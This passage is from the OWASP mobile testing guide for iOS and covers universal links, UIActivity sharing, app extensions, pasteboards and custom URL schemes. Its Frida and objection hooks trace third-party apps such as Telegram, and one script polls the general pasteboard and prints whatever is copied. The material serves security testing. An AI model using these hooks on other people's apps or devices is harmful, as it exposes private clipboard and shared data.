{\n \"applinks\": {\n \"apps\": [],\n \"details\": [\n {\n \"appID\": \"X834Q8SBVP.org.telegram.TelegramEnterprise\",\n \"paths\": [\n \"*\"\n ]\n },\n {\n \"appID\": \"C67CF9S4VU.ph.telegra.Telegraph\",\n \"paths\": [\n \"*\"\n ]\n },\n {\n \"appID\": \"X834Q8SBVP.org.telegram.Telegram-iOS\",\n \"paths\": [\n \"*\"\n ]\n }\n ]\n }\n}\n
In order to open the links we will also use the Notes app and frida-trace with the following pattern:
frida-trace -U Telegram -m \"*[* *restorationHandler*]\"\n
Write https://t.me/addstickers/radare
(found through a quick Internet research) and open it from the Notes app.
First we let frida-trace generate the stubs in __handlers__/
:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\"\nInstrumenting functions...\n-[AppDelegate application:continueUserActivity:restorationHandler:]\n
You can see that only one function was found and is being instrumented. Trigger now the universal link and observe the traces.
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n
You can observe that the function is in fact being called. You can now add code to the stubs in __handlers__/
to obtain more details:
// __handlers__/__AppDelegate_application_contin_8e36bbb1.js\n\n onEnter: function (log, args, state) {\n log(\"-[AppDelegate application: \" + args[2] + \" continueUserActivity: \" + args[3] +\n \" restorationHandler: \" + args[4] + \"]\");\n log(\"\\tapplication: \" + ObjC.Object(args[2]).toString());\n log(\"\\tcontinueUserActivity: \" + ObjC.Object(args[3]).toString());\n log(\"\\t\\twebpageURL: \" + ObjC.Object(args[3]).webpageURL().toString());\n log(\"\\t\\tactivityType: \" + ObjC.Object(args[3]).activityType().toString());\n log(\"\\t\\tuserInfo: \" + ObjC.Object(args[3]).userInfo().toString());\n log(\"\\trestorationHandler: \" +ObjC.Object(args[4]).toString());\n },\n
The new output is:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
Apart from the function parameters we have added more information by calling some methods from them to get more details, in this case about the NSUserActivity
. If we look in the Apple Developer Documentation we can see what else we can call from this object.
If you want to know more about which function actually opens the URL and how the data is actually being handled you should keep investigating.
Extend the previous command in order to find out if there are any other functions involved into opening the URL.
frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n
-i
includes any method. You can also use a glob pattern here (e.g. -i \"*open*Url*\"
means \"include any function containing 'open', then 'Url' and something else\")
Again, we first let frida-trace generate the stubs in __handlers__/
:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\nInstrumenting functions...\n-[AppDelegate application:continueUserActivity:restorationHandler:]\n$S10TelegramUI0A19ApplicationBindingsC16openUniversalUrlyySS_AA0ac4OpenG10Completion...\n$S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData18application...\n$S10TelegramUI31AuthorizationSequenceControllerC7account7strings7openUrl5apiId0J4HashAC0A4Core19...\n...\n
Now you can see a long list of functions but we still don't know which ones will be called. Trigger the universal link again and observe the traces.
/* TID 0x303 */\n298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298619 ms | $S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n 18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA\n 14OpenURLContextOSSSbAA012PresentationK0CAA0a11ApplicationM0C7Display0\n 10NavigationO0CSgyyctF()\n
Apart from the Objective-C method, now there is one Swift function that is also of your interest.
There is probably no documentation for that Swift function but you can just demangle its symbol using swift-demangle
via xcrun
:
xcrun can be used invoke Xcode developer tools from the command-line, without having them in the path. In this case it will locate and run swift-demangle, an Xcode tool that demangles Swift symbols.
$ xcrun swift-demangle S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA14OpenURLContextOSSSbAA0\n12PresentationK0CAA0a11ApplicationM0C7Display010NavigationO0CSgyyctF\n
Resulting in:
---> TelegramUI.openExternalUrl(\n account: TelegramCore.Account, context: TelegramUI.OpenURLContext, url: Swift.String,\n forceExternal: Swift.Bool, presentationData: TelegramUI.PresentationData,\n applicationContext: TelegramUI.TelegramApplicationContext,\n navigationController: Display.NavigationController?, dismissInput: () -> ()) -> ()\n
This not only gives you the class (or module) of the method, its name and the parameters but also reveals the parameter types and return type, so in case you need to dive deeper now you know where to start.
For now we will use this information to properly print the parameters by editing the stub file:
// __handlers__/TelegramUI/_S10TelegramUI15openExternalUrl7_b1a3234e.js\n\n onEnter: function (log, args, state) {\n\n log(\"TelegramUI.openExternalUrl(account: TelegramCore.Account,\n context: TelegramUI.OpenURLContext, url: Swift.String, forceExternal: Swift.Bool,\n presentationData: TelegramUI.PresentationData,\n applicationContext: TelegramUI.TelegramApplicationContext,\n navigationController: Display.NavigationController?, dismissInput: () -> ()) -> ()\");\n log(\"\\taccount: \" + ObjC.Object(args[0]).toString());\n log(\"\\tcontext: \" + ObjC.Object(args[1]).toString());\n log(\"\\turl: \" + ObjC.Object(args[2]).toString());\n log(\"\\tpresentationData: \" + args[3]);\n log(\"\\tapplicationContext: \" + ObjC.Object(args[4]).toString());\n log(\"\\tnavigationController: \" + ObjC.Object(args[5]).toString());\n },\n
This way, the next time we run it we get a much more detailed output:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n\n298619 ms | TelegramUI.openExternalUrl(account: TelegramCore.Account,\ncontext: TelegramUI.OpenURLContext, url: Swift.String, forceExternal: Swift.Bool,\npresentationData: TelegramUI.PresentationData, applicationContext:\nTelegramUI.TelegramApplicationContext, navigationController: Display.NavigationController?,\ndismissInput: () -> ()) -> ()\n298619 ms | account: TelegramCore.Account\n298619 ms | context: nil\n298619 ms | url: http://t.me/addstickers/radare\n298619 ms | presentationData: 0x1c4e40fd1\n298619 ms | applicationContext: nil\n298619 ms | navigationController: TelegramUI.PresentationData\n
There you can observe the following:
application:continueUserActivity:restorationHandler:
from the app delegate as expected.application:continueUserActivity:restorationHandler:
handles the URL but does not open it, it calls TelegramUI.openExternalUrl
for that.https://t.me/addstickers/radare
.You can now keep going and try to trace and verify how the data is being validated. For example, if you have two apps that communicate via universal links you can use this to see if the sending app is leaking sensitive data by hooking these methods in the receiving app. This is especially useful when you don't have the source code as you will be able to retrieve the full URL that you wouldn't see other way as it might be the result of clicking some button or triggering some functionality.
In some cases, you might find data in userInfo
of the NSUserActivity
object. In the previous case there was no data being transferred but it might be the case for other scenarios. To see this, be sure to hook the userInfo
property or access it directly from the continueUserActivity
object in your hook (e.g. by adding a line like this log(\"userInfo:\" + ObjC.Object(args[3]).userInfo().toString());
).
Universal links and Apple's Handoff feature are related:
application:continueUserActivity:restorationHandler:\n
com.apple.developer.associated-domains
entitlement and in the server's apple-app-site-association
file (in both cases via the keyword \"activitycontinuation\":
). See \"Retrieving the Apple App Site Association File\" above for an example.Actually, the previous example in \"Checking How the Links Are Opened\" is very similar to the \"Web Browser-to-Native App Handoff\" scenario described in the \"Handoff Programming Guide\":
If the user is using a web browser on the originating device, and the receiving device is an iOS device with a native app that claims the domain portion of the webpageURL
property, then iOS launches the native app and sends it an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The webpageURL
property contains the URL the user was visiting, while the userInfo
dictionary is empty.
In the detailed output above you can see that NSUserActivity
object we've received meets exactly the mentioned points:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
This knowledge should help you when testing apps supporting Handoff.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/","title":"Testing UIActivity Sharing","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#sending-items","title":"Sending Items","text":"When testing UIActivity
Sharing you should pay special attention to:
Data sharing via UIActivity
works by creating a UIActivityViewController
and passing it the desired items (URLs, text, a picture) on init(activityItems: applicationActivities:)
.
As we mentioned before, it is possible to exclude some of the sharing mechanisms via the controller's excludedActivityTypes
property. It is highly recommended to do the tests using the latest versions of iOS as the number of activity types that can be excluded can increase. The developers have to be aware of this and explicitly exclude the ones that are not appropriate for the app data. Some activity types might not be even documented like \"Create Watch Face\".
If having the source code, you should take a look at the UIActivityViewController
:
init(activityItems:applicationActivities:)
method.excludedActivityTypes
, if any.If you only have the compiled/installed app, try searching for the previous method and property, for example:
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep -i activityItems\n0x1000df034 45 44 initWithActivityItems:applicationActivities:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#receiving-items","title":"Receiving Items","text":"When receiving items, you should check:
application:openURL:options:
(or its deprecated version UIApplicationDelegate application:openURL:sourceApplication:annotation:
) in the app delegate.If not having the source code you can still take a look into the Info.plist
file and search for:
UTExportedTypeDeclarations
/UTImportedTypeDeclarations
if the app declares exported/imported custom document types.CFBundleDocumentTypes
to see if the app specifies any document types that it can open.A very complete explanation about the use of these keys can be found on Stackoverflow.
Let's see a real-world example. We will take a File Manager app and take a look at these keys. We used objection here to read the Info.plist
file.
objection --gadget SomeFileManager run ios plist cat Info.plist\n
Note that this is the same as if we would retrieve the IPA from the phone or accessed via e.g. SSH and navigated to the corresponding folder in the IPA / app sandbox. However, with objection we are just one command away from our goal and this can be still considered static analysis.
The first thing we noticed is that app does not declare any imported custom document types but we could find a couple of exported ones:
UTExportedTypeDeclarations = (\n {\n UTTypeConformsTo = (\n \"public.data\"\n );\n UTTypeDescription = \"SomeFileManager Files\";\n UTTypeIdentifier = \"com.some.filemanager.custom\";\n UTTypeTagSpecification = {\n \"public.filename-extension\" = (\n ipa,\n deb,\n zip,\n rar,\n tar,\n gz,\n ...\n key,\n pem,\n p12,\n cer\n );\n };\n }\n);\n
The app also declares the document types it opens as we can find the key CFBundleDocumentTypes
:
CFBundleDocumentTypes = (\n {\n ...\n CFBundleTypeName = \"SomeFileManager Files\";\n LSItemContentTypes = (\n \"public.content\",\n \"public.data\",\n \"public.archive\",\n \"public.item\",\n \"public.database\",\n \"public.calendar-event\",\n ...\n );\n }\n);\n
We can see that this File Manager will try to open anything that conforms to any of the UTIs listed in LSItemContentTypes
and it's ready to open files with the extensions listed in UTTypeTagSpecification/\"public.filename-extension\"
. Please take a note of this because it will be useful if you want to search for vulnerabilities when dealing with the different types of files when performing dynamic analysis.
There are three main things you can easily inspect by performing dynamic instrumentation:
activityItems
: an array of the items being shared. They might be of different types, e.g. one string and one picture to be shared via a messaging app.applicationActivities
: an array of UIActivity
objects representing the app's custom services.excludedActivityTypes
: an array of the Activity Types that are not supported, e.g. postToFacebook
.To achieve this you can do two things:
init(activityItems: applicationActivities:)
) to get the activityItems
and applicationActivities
.excludedActivityTypes
property.Let's see an example using Telegram to share a picture and a text file. First prepare the hooks, we will use the Frida REPL and write a script for this:
Interceptor.attach(\nObjC.classes.\n UIActivityViewController['- initWithActivityItems:applicationActivities:'].implementation, {\n onEnter: function (args) {\n\n printHeader(args)\n\n this.initWithActivityItems = ObjC.Object(args[2]);\n this.applicationActivities = ObjC.Object(args[3]);\n\n console.log(\"initWithActivityItems: \" + this.initWithActivityItems);\n console.log(\"applicationActivities: \" + this.applicationActivities);\n\n },\n onLeave: function (retval) {\n printRet(retval);\n }\n});\n\nInterceptor.attach(\nObjC.classes.UIActivityViewController['- excludedActivityTypes'].implementation, {\n onEnter: function (args) {\n printHeader(args)\n },\n onLeave: function (retval) {\n printRet(retval);\n }\n});\n\nfunction printHeader(args) {\n console.log(Memory.readUtf8String(args[1]) + \" @ \" + args[1])\n};\n\nfunction printRet(retval) {\n console.log('RET @ ' + retval + ': ' );\n try {\n console.log(new ObjC.Object(retval).toString());\n } catch (e) {\n console.log(retval.toString());\n }\n};\n
You can store this as a JavaScript file, e.g. inspect_send_activity_data.js
and load it like this:
frida -U Telegram -l inspect_send_activity_data.js\n
Now observe the output when you first share a picture:
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<UIImage: 0x1c4aa0b40> size {571, 264} orientation 0 scale 1.000000\"\n)\napplicationActivities: nil\nRET @ 0x13cb2b800:\n<UIActivityViewController: 0x13cb2b800>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x0:\nnil\n
and then a text file:
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<QLActivityItemProvider: 0x1c4a30140>\",\n \"<UIPrintInfo: 0x1c0699a50>\"\n)\napplicationActivities: (\n)\nRET @ 0x13c4bdc00:\n<_UIDICActivityViewController: 0x13c4bdc00>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x1c001b1d0:\n(\n \"com.apple.UIKit.activity.MarkupAsPDF\"\n)\n
You can see that:
UIImage
and there are no excluded activities.com.apple.UIKit.activity. MarkupAsPDF
is excluded.In the previous example, there were no custom applicationActivities
and only one excluded activity. However, to better illustrate what you can expect from other apps we have shared a picture using another app, here you can see a bunch of application activities and excluded activities (output was edited to hide the name of the originating app):
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<SomeActivityItemProvider: 0x1c04bd580>\"\n)\napplicationActivities: (\n \"<SomeActionItemActivityAdapter: 0x141de83b0>\",\n \"<SomeActionItemActivityAdapter: 0x147971cf0>\",\n \"<SomeOpenInSafariActivity: 0x1479f0030>\",\n \"<SomeOpenInChromeActivity: 0x1c0c8a500>\"\n)\nRET @ 0x142138a00:\n<SomeActivityViewController: 0x142138a00>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x14797c3e0:\n(\n \"com.apple.UIKit.activity.Print\",\n \"com.apple.UIKit.activity.AssignToContact\",\n \"com.apple.UIKit.activity.SaveToCameraRoll\",\n \"com.apple.UIKit.activity.CopyToPasteboard\",\n)\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#receiving-items_1","title":"Receiving Items","text":"After performing the static analysis you would know the document types that the app can open and if it declares any custom document types and (part of) the methods involved. You can use this now to test the receiving part:
application:openURL:options:
and any other methods that were identified in a previous static analysis.To illustrate this with an example we have chosen the same real-world file manager app from the static analysis section and followed these steps:
As there is no default app that will open the file, it switches to the Open with... popup. There, we can select the app that will open our file. The next screenshot shows this (we have modified the display name using Frida to conceal the app's real name):
After selecting SomeFileManager we can see the following:
(0x1c4077000) -[AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101c00950>\nopenURL: file:///var/mobile/Library/Application%20Support\n /Containers/com.some.filemanager/Documents/Inbox/OWASP_MASVS.pdf\noptions: {\n UIApplicationOpenURLOptionsAnnotationKey = {\n LSMoveDocumentOnOpen = 1;\n };\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.sharingd\";\n \"_UIApplicationOpenURLOptionsSourceProcessHandleKey\" = \"<FBSProcessHandle: 0x1c3a63140;\n sharingd:605; valid: YES>\";\n}\n0x18c7930d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n...\n0x1857cdc34 FrontBoardServices!-[FBSSerialQueue _performNextFromRunLoopSource]\nRET: 0x1\n
As you can see, the sending application is com.apple.sharingd
and the URL's scheme is file://
. Note that once we select the app that should open the file, the system already moved the file to the corresponding destination, that is to the app's Inbox. The apps are then responsible for deleting the files inside their Inboxes. This app, for example, moves the file to /var/mobile/Documents/
and removes it from the Inbox.
(0x1c002c760) -[XXFileManager moveItemAtPath:toPath:error:]\nmoveItemAtPath: /var/mobile/Library/Application Support/Containers\n /com.some.filemanager/Documents/Inbox/OWASP_MASVS.pdf\ntoPath: /var/mobile/Documents/OWASP_MASVS (1).pdf\nerror: 0x16f095bf8\n0x100f24e90 SomeFileManager!-[AppDelegate __handleOpenURL:]\n0x100f25198 SomeFileManager!-[AppDelegate application:openURL:options:]\n0x18c7930d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n...\n0x1857cd9f4 FrontBoardServices!__FBSSERIALQUEUE_IS_CALLING_OUT_TO_A_BLOCK__\nRET: 0x1\n
If you look at the stack trace, you can see how application:openURL:options:
called __handleOpenURL:
, which called moveItemAtPath:toPath:error:
. Notice that we have now this information without having the source code for the target app. The first thing that we had to do was clear: hook application:openURL:options:
. Regarding the rest, we had to think a little bit and come up with methods that we could start tracing and are related to the file manager, for example, all methods containing the strings \"copy\", \"move\", \"remove\", etc. until we have found that the one being called was moveItemAtPath:toPath:error:
.
A final thing worth noticing here is that this way of handling incoming files is the same for custom URL schemes. Please refer to the \"Testing Custom URL Schemes\" section for more information.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/","title":"Testing App Extensions","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#static-analysis","title":"Static Analysis","text":"The static analysis will take care of:
If you have the original source code you can search for all occurrences of NSExtensionPointIdentifier
with Xcode (cmd+shift+f) or take a look into \"Build Phases / Embed App extensions\":
There you can find the names of all embedded app extensions followed by .appex
, now you can navigate to the individual app extensions in the project.
If not having the original source code:
Grep for NSExtensionPointIdentifier
among all files inside the app bundle (IPA or installed app):
$ grep -nr NSExtensionPointIdentifier Payload/Telegram\\ X.app/\nBinary file Payload/Telegram X.app//PlugIns/SiriIntents.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/Share.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/NotificationContent.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/Widget.appex/Info.plist matches\nBinary file Payload/Telegram X.app//Watch/Watch.app/PlugIns/Watch Extension.appex/Info.plist matches\n
You can also access per SSH, find the app bundle and list all inside PlugIns (they are placed there by default) or do it with objection:
ph.telegra.Telegraph on (iPhone: 11.1.2) [usb] # cd PlugIns\n /var/containers/Bundle/Application/15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35/\n Telegram X.app/PlugIns\n\nph.telegra.Telegraph on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection Read Write Name\n------------ ------- ------------------ ------ ------- -------------------------\nDirectory 493 None True False NotificationContent.appex\nDirectory 493 None True False Widget.appex\nDirectory 493 None True False Share.appex\nDirectory 493 None True False SiriIntents.appex\n
We can see now the same four app extensions that we saw in Xcode before.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#determining-the-supported-data-types","title":"Determining the Supported Data Types","text":"This is important for data being shared with host apps (e.g. via Share or Action Extensions). When the user selects some data type in a host app and it matches the data types define here, the host app will offer the extension. It is worth noticing the difference between this and data sharing via UIActivity
where we had to define the document types, also using UTIs. An app does not need to have an extension for that. It is possible to share data using only UIActivity
.
Inspect the app extension's Info.plist
file and search for NSExtensionActivationRule
. That key specifies the data being supported as well as e.g. maximum of items supported. For example:
<key>NSExtensionAttributes</key>\n <dict>\n <key>NSExtensionActivationRule</key>\n <dict>\n <key>NSExtensionActivationSupportsImageWithMaxCount</key>\n <integer>10</integer>\n <key>NSExtensionActivationSupportsMovieWithMaxCount</key>\n <integer>1</integer>\n <key>NSExtensionActivationSupportsWebURLWithMaxCount</key>\n <integer>1</integer>\n </dict>\n </dict>\n
Only the data types present here and not having 0
as MaxCount
will be supported. However, more complex filtering is possible by using a so-called predicate string that will evaluate the UTIs given. Please refer to the Apple App Extension Programming Guide for more detailed information about this.
Remember that app extensions and their containing apps do not have direct access to each other\u2019s containers. However, data sharing can be enabled. This is done via \"App Groups\" and the NSUserDefaults
API. See this figure from Apple App Extension Programming Guide:
As also mentioned in the guide, the app must set up a shared container if the app extension uses the NSURLSession
class to perform a background upload or download, so that both the extension and its containing app can access the transferred data.
It is possible to reject a specific type of app extension by using the following method:
application:shouldAllowExtensionPointIdentifier:
However, it is currently only possible for \"custom keyboard\" app extensions (and should be verified when testing apps handling sensitive data via the keyboard like e.g. banking apps).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#dynamic-analysis","title":"Dynamic Analysis","text":"For the dynamic analysis we can do the following to gain knowledge without having the source code:
For this we should hook NSExtensionContext - inputItems
in the data originating app.
Following the previous example of Telegram we will now use the \"Share\" button on a text file (that was received from a chat) to create a note in the Notes app with it:
If we run a trace, we'd see the following output:
(0x1c06bb420) NSExtensionContext - inputItems\n0x18284355c Foundation!-[NSExtension _itemProviderForPayload:extensionContext:]\n0x1828447a4 Foundation!-[NSExtension _loadItemForPayload:contextIdentifier:completionHandler:]\n0x182973224 Foundation!__NSXPCCONNECTION_IS_CALLING_OUT_TO_EXPORTED_OBJECT_S3__\n0x182971968 Foundation!-[NSXPCConnection _decodeAndInvokeMessageWithEvent:flags:]\n0x182748830 Foundation!message_handler\n0x181ac27d0 libxpc.dylib!_xpc_connection_call_event_handler\n0x181ac0168 libxpc.dylib!_xpc_connection_mach_event\n...\nRET: (\n\"<NSExtensionItem: 0x1c420a540> - userInfo:\n{\n NSExtensionItemAttachmentsKey = (\n \"<NSItemProvider: 0x1c46b30e0> {types = (\\n \\\"public.plain-text\\\",\\n \\\"public.file-url\\\"\\n)}\"\n );\n}\"\n)\n
Here we can observe that:
NSXPCConnection
that uses the libxpc.dylib
Framework.NSItemProvider
are public.plain-text
and public.file-url
, the latter being included in NSExtensionActivationRule
from the Info.plist
of the \"Share Extension\" of Telegram.You can also find out which app extension is taking care of your the requests and responses by hooking NSExtension - _plugIn
:
We run the same example again:
(0x1c0370200) NSExtension - _plugIn\nRET: <PKPlugin: 0x1163637f0 ph.telegra.Telegraph.Share(5.3) 5B6DE177-F09B-47DA-90CD-34D73121C785\n1(2) /private/var/containers/Bundle/Application/15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35\n/Telegram X.app/PlugIns/Share.appex>\n\n(0x1c0372300) -[NSExtension _plugIn]\nRET: <PKPlugin: 0x10bff7910 com.apple.mobilenotes.SharingExtension(1.5) 73E4F137-5184-4459-A70A-83\nF90A1414DC 1(2) /private/var/containers/Bundle/Application/5E267B56-F104-41D0-835B-F1DAB9AE076D\n/MobileNotes.app/PlugIns/com.apple.mobilenotes.SharingExtension.appex>\n
As you can see there are two app extensions involved:
Share.appex
is sending the text file (public.plain-text
and public.file-url
).com.apple.mobilenotes.SharingExtension.appex
which is receiving and will process the text file.If you want to learn more about what's happening under-the-hood in terms of XPC, we recommend to take a look at the internal calls from \"libxpc.dylib\". For example you can use frida-trace
and then dig deeper into the methods that you find more interesting by extending the automatically generated stubs.
The systemwide general pasteboard can be obtained by using generalPasteboard
, search the source code or the compiled binary for this method. Using the systemwide general pasteboard should be avoided when dealing with sensitive data.
Custom pasteboards can be created with pasteboardWithName:create:
or pasteboardWithUniqueName
. Verify if custom pasteboards are set to be persistent as this is deprecated since iOS 10. A shared container should be used instead.
In addition, the following can be inspected:
removePasteboardWithName:
, which invalidates an app pasteboard, freeing up all resources used by it (no effect for the general pasteboard).setItems:options:
with the UIPasteboardOptionLocalOnly
option.setItems:options:
with the UIPasteboardOptionExpirationDate
option.Hook or trace the following:
generalPasteboard
for the system-wide general pasteboard.pasteboardWithName:create:
and pasteboardWithUniqueName
for custom pasteboards.Hook or trace the deprecated setPersistent:
method and verify if it's being called.
When monitoring the pasteboards, there is several details that may be dynamically retrieved:
pasteboardWithName:create:
and inspecting its input parameters or pasteboardWithUniqueName
and inspecting its return value.string
method. Or use any of the other methods for the standard data types.numberOfItems
.hasImages
, hasStrings
, hasURLs
(starting in iOS 10).containsPasteboardTypes: inItemSet:
. You may inspect for more concrete data types like, for example an picture as public.png and public.tiff (UTIs) or for custom data such as com.mycompany.myapp.mytype. Remember that, in this case, only those apps that declare knowledge of the type are able to understand the data written to the pasteboard. This is the same as we have seen in the \"UIActivity Sharing\" section. Retrieve them using itemSetWithPasteboardTypes:
and setting the corresponding UTIs.setItems:options:
and inspecting its options for UIPasteboardOptionLocalOnly
or UIPasteboardOptionExpirationDate
.If only looking for strings you may want to use objection's command ios pasteboard monitor
:
Hooks into the iOS UIPasteboard class and polls the generalPasteboard every 5 seconds for data. If new data is found, different from the previous poll, that data will be dumped to screen.
You may also build your own pasteboard monitor that monitors specific information as seen above.
For example, this script (inspired from the script behind objection's pasteboard monitor) reads the pasteboard items every 5 seconds, if there's something new it will print it:
const UIPasteboard = ObjC.classes.UIPasteboard;\n const Pasteboard = UIPasteboard.generalPasteboard();\n var items = \"\";\n var count = Pasteboard.changeCount().toString();\n\nsetInterval(function () {\n const currentCount = Pasteboard.changeCount().toString();\n const currentItems = Pasteboard.items().toString();\n\n if (currentCount === count) { return; }\n\n items = currentItems;\n count = currentCount;\n\n console.log('[* Pasteboard changed] count: ' + count +\n ' hasStrings: ' + Pasteboard.hasStrings().toString() +\n ' hasURLs: ' + Pasteboard.hasURLs().toString() +\n ' hasImages: ' + Pasteboard.hasImages().toString());\n console.log(items);\n\n }, 1000 * 5);\n
In the output we can see the following:
[* Pasteboard changed] count: 64 hasStrings: true hasURLs: false hasImages: false\n(\n {\n \"public.utf8-plain-text\" = hola;\n }\n)\n[* Pasteboard changed] count: 65 hasStrings: true hasURLs: true hasImages: false\n(\n {\n \"public.url\" = \"https://codeshare.frida.re/\";\n \"public.utf8-plain-text\" = \"https://codeshare.frida.re/\";\n }\n)\n[* Pasteboard changed] count: 66 hasStrings: false hasURLs: false hasImages: true\n(\n {\n \"com.apple.uikit.image\" = \"<UIImage: 0x1c42b23c0> size {571, 264} orientation 0 scale 1.000000\";\n \"public.jpeg\" = \"<UIImage: 0x1c44a1260> size {571, 264} orientation 0 scale 1.000000\";\n \"public.png\" = \"<UIImage: 0x1c04aaaa0> size {571, 264} orientation 0 scale 1.000000\";\n }\n)\n
You see that first a text was copied including the string \"hola\", after that a URL was copied and finally a picture was copied. Some of them are available via different UTIs. Other apps will consider these UTIs to allow pasting of this data or not.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/","title":"Testing Custom URL Schemes","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#static-analysis","title":"Static Analysis","text":"There are a couple of things that we can do using static analysis. In the next sections we will see the following:
The first step to test custom URL schemes is finding out whether an application registers any protocol handlers.
If you have the original source code and want to view registered protocol handlers, simply open the project in Xcode, go to the Info tab and open the URL Types section as presented in the screenshot below:
Also in Xcode you can find this by searching for the CFBundleURLTypes
key in the app\u2019s Info.plist
file (example from iGoat-Swift):
<key>CFBundleURLTypes</key>\n<array>\n <dict>\n <key>CFBundleURLName</key>\n <string>com.iGoat.myCompany</string>\n <key>CFBundleURLSchemes</key>\n <array>\n <string>iGoat</string>\n </array>\n </dict>\n</array>\n
In a compiled application (or IPA), registered protocol handlers are found in the file Info.plist
in the app bundle's root folder. Open it and search for the CFBundleURLSchemes
key, if present, it should contain an array of strings (example from iGoat-Swift):
grep -A 5 -nri urlsch Info.plist\nInfo.plist:45: <key>CFBundleURLSchemes</key>\nInfo.plist-46- <array>\nInfo.plist-47- <string>iGoat</string>\nInfo.plist-48- </array>\n
Once the URL scheme is registered, other apps can open the app that registered the scheme, and pass parameters by creating appropriately formatted URLs and opening them with the UIApplication openURL:options:completionHandler:
method.
Note from the App Programming Guide for iOS:
If more than one third-party app registers to handle the same URL scheme, there is currently no process for determining which app will be given that scheme.
This could lead to a URL scheme hijacking attack (see page 136 in [#thiel2]).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-application-query-schemes-registration","title":"Testing Application Query Schemes Registration","text":"Before calling the openURL:options:completionHandler:
method, apps can call canOpenURL:
to verify that the target app is available. However, as this method was being used by malicious app as a way to enumerate installed apps, from iOS 9.0 the URL schemes passed to it must be also declared by adding the LSApplicationQueriesSchemes
key to the app's Info.plist
file and an array of up to 50 URL schemes.
<key>LSApplicationQueriesSchemes</key>\n <array>\n <string>url_scheme1</string>\n <string>url_scheme2</string>\n </array>\n
canOpenURL
will always return NO
for undeclared schemes, whether or not an appropriate app is installed. However, this restriction only applies to canOpenURL
.
The openURL:options:completionHandler:
method will still open any URL scheme, even if the LSApplicationQueriesSchemes
array was declared, and return YES
/ NO
depending on the result.
As an example, Telegram declares in its Info.plist
these Queries Schemes, among others:
